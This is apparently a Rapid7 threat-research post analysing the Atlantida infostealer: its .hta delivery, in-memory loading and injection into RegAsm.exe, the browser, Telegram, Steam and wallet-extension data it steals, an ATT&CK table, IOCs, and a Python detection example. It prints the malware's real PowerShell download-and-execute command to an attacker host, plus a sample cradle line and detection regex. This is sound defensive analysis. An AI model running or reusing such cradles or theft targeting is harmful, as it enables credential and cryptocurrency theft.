Last updated at Tue, 27 Feb 2024 16:14:43 GMT

Recently, Rapid7 observed a new stealer named Atlantida. The stealer lures users into downloading malicious files from compromised websites and employs several evasion techniques, such as reflective loading and process injection, before the stealer itself is loaded.

Atlantida steals a large amount of login information from software such as Telegram and Steam, data from several offline cryptocurrency wallets, browser-stored data, and data from cryptocurrency wallet browser extensions. It also captures the victim's screen and collects hardware data.

Technical Analysis

Stage 1 - Delivery

The attack starts with a user downloading a malicious .hta file from a compromised website. It is worth mentioning that the .hta file is manually executed by the victim. When investigating the file, we observed a Visual Basic script decrypting a hard-coded base64 string and executing the decrypted content:

The decrypted command: `"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" irm hxxp://166.1.160[.]10/loader.txt | iex`

Stage 2 - Three levels of in-memory loading

The executed PowerShell command downloads and executes the next-stage PowerShell script in memory.

The PowerShell script downloads and reflectively loads a .NET downloader. The .NET downloader is a simple downloader that calls the DownloadData API function to get a Donut injector. Donut is position-independent code that enables in-memory execution of VBScript, JScript, EXE, DLL files and .NET assemblies. Next, the Donut is injected into a newly created "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" by using a Remote Thread Injection technique (aka CreateRemoteThread). This technique works by writing shellcode into the context of another eligible process and creating a thread in that process to run the payload.

Figure 4 - .Net downloader Main function

Stage 3 - Atlantida Stealer

The Donut injector is used to load the final payload, in our case a new Atlantida stealer. It is named after a string found in the executable.

First, the Atlantida stealer captures the whole screen by using a combination of the GetDC, CreateCompatibleDC, CreateDIBSection, SelectObject and BitBlt API functions. Next, it checks whether a FileZilla (open source FTP software that allows users to transfer files from a local computer to a remote computer) recent servers file exists. It does that by attempting to open "C:\Users\username\AppData\Roaming\FileZilla\recentservers.xml"; if it exists, it reads the file. Next, it looks for the following offline cryptocurrency wallets by enumerating the files under the wallet paths:

The stealer reads all files found under the enumerated paths.

Next, it collects the victim's hardware data, such as RAM, GPU, CPU and screen resolution. The stealer enumerates the user's Desktop folder and reads all text files (.txt). It also looks for Binance wallet credentials by enumerating the "C:\Users\Username\AppData\Roaming\Binance" directory and reading all JSON files under it.

Steam (a video game digital distribution service) configuration and credentials are also of interest to the Atlantida stealer, as we observed it enumerating the Steam config directory and searching for the following files:

  1. Ssfn - Steam Sentry File.
  2. Config.vdf - Steam configuration file.
  3. Loginusers.vdf - Stores records of previously logged-in Steam accounts.

Figure 6 - Steam files enumeration

The last thing Atlantida collects is Telegram data. It collects all data located in "C:\Users\Username\AppData\Roaming\Telegram Desktop\tdata".

The stealer now connects to the hard-coded C&C server (45.144.232.99). We visited the hard-coded IP and reached a login page for what we believe is the stealer's control panel, which also had an `Atlantida` title.

Figure 7 - Atlantida login page


No data is passed to the C&C server at this point and the stealer continues its collection. Differently from other stealers, Atlantida only targets three browsers: Google Chrome, Mozilla Firefox and Microsoft Edge. It steals all stored passwords, cookies, tokens, credit cards and autofill data.

One of its notable features is its ability to steal data from Chromium-based browser extensions. Every Chromium-based extension is assigned an "extension ID", and the malware uses this ID to locate the data the extension has stored. Atlantida collects data from the following cryptocurrency wallet extensions:

| Extension Name | Extension ID |
|---|---|
| Metamask | nkbihfbeogaeaoehlefnkodbefgpgknn |
| Sollet | fhmfendgdocmcbmfikdcogofphimnkno |
| BNB chain wallet | fhbohimaelbohpjbbldcngcnapndodjp |
| Phantom | bfnaelmomeimhlpmgjnjophhpkkoljpa |
| Metawallet | bkklifkecemccedpkhcebagjpehhabfb |
| Yoroi | ffnbelfdoeiohenkjibnmadjiehjhajb |
| Nami | lpfcbjknijpeeillifnkikgncikgfhdo |
| Flint | hnhobjmcibchnmglfbldbfabcgaknlkj |
| CardWallet | apnehcjmnengpnmccpaibjmhhoadaico |
| Guildwallet | nanjmdknhkinifnkgdcggcfnhdaammmj |
| TronWallet | pnndplcbkakcplkjnolgbkdgjikjednm |
| CryptoAirdrops | dhgnlgphgchebgoemcjekedjjbifijid |
| Bitoke | oijajbhmelbcoclnkdmembiacmeghbae |
| Coin89 | aeachknmefphepccionboohckonoeemg |
| XDefiWallet | hmeobnfnfcmdkdcmlblgagmfpfboieaf |
| Keplr | dmkamcknogkgcdfhhbddcghachkejeap |
| FreaksAxie | copjnifcecdedocejpaapepagaodgpbh |
| Oasis | ppdadbejkmjnefldpcdjhnkpbjkikoip |
| Rabby | acmacodkjbdgmoleebolmdjonilkdbch |
| MathWallet | afbcbjpbpfadlkmhmclhkeeodmamcflc |
| NiftyWallet | jbdaocneiiinmjbjlgalhcelgbejmnid |
| Guarda | hpglfhgfnhbgpjdenjgmdgoeiappafln |
| EQUALWallet | blnieiiffboillknjnepogjhkgnoapac |
| BitAppWallet | fihkakfobkmkjojpchpfgcmhfjnmnfpi |
| iWallet | kncchdigobghenbbaddojjnnaogfppfj |
| Wombat | amkmjjmmflddogmhpjloimipbofnfjih |
| MEW CX | nlbmnnijcnlegkjjpcfjclmcfggfefdm |
| GuildWallet | nkddgncdjgjfcddamfgcmfnlhccnimig |
| Saturn Wallet | cphhlgmgameodnhkjdmkpanlelnlohao |
| CloverWallet | nhnkbkgjikgcigadomkphalanndcapjk |
| LiqualityWallet | kpfopkelmapcoipemfendmdcghnegimn |
| TerraStation | aiifbnbfobpmeekipheeijimdpnlpgpp |
| AuroWallet | cnmamaachppnkjgnildpdmkaakejnhae |
| Polymesh Wallet | jojhfeoedkpkglbfimdfabpdfjaoolaf |
| ICONex | flpiciilemghbmfalicajoolhkkenfel |
| NaboxWallet | nknhiehlklippafakaeklbeglecifhad |
| KHC | hcflpincpppdclinealmandijcmnkbgn |
| Temple | ookjlbkiijinhpmnjffcofjonbfbgaoc |
| TezBox | mnfifefkajgofkcjkemidiaecocnkjeh |
| CyanoWallet | dkdedlpgdmmkkfjabffeganieamfklkm |
| Byone | nlgbhdfgdhgbiamfdfmbikcdghidoadd |
| OneKey | infeboajgfhgbjpjbeppbkgnabfdkdaf |
| Leaf Wallet | cihmoadaighcejopammfbmddcmdekcje |
| BitClip | ijmpgkjfkbfhoebgogflfebnmejmfbml |
| NashExtension | onofpnbbkehpmmoabgpcpmigafmmnjhl |
| HyconLiteClient | bcopgchhojmggmffilplmbdicgaihlkp |

When the stealer finishes collecting, all data is compressed and sent to the C&C server. Then the malware exits.

Rapid7 Customers

For Rapid7 MDR and InsightIDR customers, the following Attacker Behavior Analytics (ABA) rule is currently deployed and alerts on the activity described in this blog:

  • Suspicious Process - MSHTA Spawns PowerShell
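The two observable pivots in this chain, mshta.exe spawning PowerShell with a download cradle (Stage 1) and PowerShell creating a remote thread in RegAsm.exe (Stage 2), can be expressed as simple rules over process-creation and CreateRemoteThread telemetry. The following is an added example (not Rapid7's ABA rule or any code from the report) run over constructed Sysmon-style events; the event field names follow Sysmon Event ID 1 and 8, and the URL in the sample is a placeholder.

```python
import re

# Constructed Sysmon-style events (not from the original report): EventID 1 is
# process creation, EventID 8 is CreateRemoteThread. The paths mirror the
# chain described above (mshta -> powershell, injection into RegAsm.exe).
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe irm http://attacker.example/loader.txt | iex"},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"EventID": 8, "SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetImage": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"},
    {"EventID": 8, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Program Files\App\app.exe"},
]

# A "download cradle": a web fetch whose output is piped straight into iex.
CRADLE_RE = re.compile(
    r"\b(irm|iwr|Invoke-RestMethod|Invoke-WebRequest|DownloadString|DownloadData)\b"
    r".*\|\s*(iex|Invoke-Expression)\b", re.IGNORECASE)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def mshta_spawns_powershell(ev):
    return (ev["EventID"] == 1 and basename(ev["ParentImage"]) == "mshta.exe"
            and basename(ev["Image"]) in ("powershell.exe", "pwsh.exe"))

def has_download_cradle(ev):
    return ev["EventID"] == 1 and bool(CRADLE_RE.search(ev.get("CommandLine", "")))

def remote_thread_into_regasm(ev):
    # Stage 2: CreateRemoteThread from a PowerShell host into RegAsm.exe
    return (ev["EventID"] == 8 and basename(ev["TargetImage"]) == "regasm.exe"
            and basename(ev["SourceImage"]) in ("powershell.exe", "pwsh.exe"))

RULES = {
    "MSHTA Spawns PowerShell": mshta_spawns_powershell,
    "PowerShell Download Cradle": has_download_cradle,
    "Remote Thread Into RegAsm": remote_thread_into_regasm,
}

def triage(events):
    """Return (rule name, event index) pairs for every event a rule matches."""
    return [(name, i) for i, ev in enumerate(events)
            for name, rule in RULES.items() if rule(ev)]

if __name__ == "__main__":
    for name, idx in triage(SAMPLE_EVENTS):
        print(f"{name}: event #{idx}")
```

The benign explorer.exe-spawned PowerShell and the csrss.exe remote thread are included so the rules can be checked against normal activity as well as the chain described above.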

MITRE ATT&CK Techniques:

| Tactic | Technique | Details |
|---|---|---|
| Execution | User Execution: Malicious File (T1204.002) | A user downloads and executes the malicious .hta file |
| Execution | Command and Scripting Interpreter: Visual Basic (T1059.005) | The .hta contains a malicious VBScript function |
| Execution | Command and Scripting Interpreter: PowerShell (T1059.001) | VBScript executes PowerShell to download a PowerShell script |
| Command and Control | Ingress Tool Transfer (T1105) | A PowerShell script downloads an additional .Net loader |
| Defense Evasion | Reflective Code Loading (T1620) | The PowerShell script executes the loader reflectively |
| Defense Evasion | Process Injection (T1055) | The .Net loader injects into the RegAsm.exe process |
| Credential Access | Credentials from Password Stores: Credentials from Web Browsers (T1555.003) | Atlantida steals stored browser data such as passwords, cookies, tokens, credit cards and autofill data |
| Credential Access | Credentials from Password Stores (T1555) | Atlantida steals offline cryptocurrency wallet data and other software data |
| Discovery | System Information Discovery (T1082) | Atlantida collects the victim's hardware information |
| Collection | Screen Capture (T1113) | Atlantida captures the victim's screen |
| Exfiltration | Exfiltration Over C2 Channel (T1041) | Atlantida exfiltrates all collected data |

IOCs

| IOC | SHA-256 | Notes |
|---|---|---|
| ReadEra_v1.4.2.hta | 67b8776b9d8f581173bcb471e91ff1701cafbc92aaed858fe3cb26a31dd6a6d8 | Malicious .hta file |
| http://166.1.160[.]10/loader.txt | | Malicious PowerShell script |
| http://166.1.160[.]10/www_c.bin | f935143dba2fb65eef931c1dac74a740e58e9e911a13457f4cfa4c73a0c673b3 | Stores .Net loader |
| http://166.1.160[.]10/www.bin | 350216884486d1fafbd60e1d9c87c48149b058e4fab6b9a2a5cd7ea67ab250a0 | Stores Donut shellcode |
| AtlantidaStealer.exe | b4f4d51431c4e3f7aeb01057dc851454cff4e64d16c05d9da12dfb428715d130 | Atlantida stealer |
| 45.144.232[.]99 | | C&C server |